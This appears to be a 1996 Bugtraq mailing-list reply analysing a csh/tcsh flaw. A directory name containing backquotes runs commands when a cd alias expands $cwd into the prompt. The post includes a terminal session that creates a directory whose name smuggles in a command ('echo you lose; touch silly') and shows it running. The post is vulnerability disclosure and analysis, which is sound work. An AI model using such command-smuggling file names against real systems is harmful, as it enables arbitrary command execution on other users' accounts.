[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Re: tee see shell problems
From:       Paul Szabo <szabo_p () maths ! su ! oz ! au>
Date:       1996-09-18 10:44:09
[Download RAW message or body]

> A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
> out with BSDI anyway.) that allows the execution of arbitrary commands
> when changing into directories that are enclosed with back tic's.

It seems to me that the problem may be with the way you define your cd
command: surely it is the expansion of $cwd, if containing backquotes, that
does the damage. (csh is known to do several passes of variable and command
substitution.) I have the following under /bin/csh, both with Apollo
Domain/OS and DEC Alpha OSF/1 (dUNIX v3.2 or v4.0):

tmp% pwd
/tmp
tmp% which cd
alias/cd 'chdir !*; set prompt="$cwd:t% "'
tmp% mkdir '`echo you lose; touch silly`'
tmp% ls -l
total 1
drwx------   2 psz      system       512 Sep 18 10:28 `echo you lose; touch silly`
tmp% cd *echo*
you lose% pwd
/tmp/`echo you lose; touch silly`
you lose% ls -l
total 0
-rw-------   1 psz      system         0 Sep 18 10:28 silly

Paul Szabo - System Manager   //        School of Mathematics and Statistics
psz@maths.usyd.edu.au         //   University of Sydney, NSW 2006, Australia

[prev in list] [next in list] [prev in thread] [next in thread]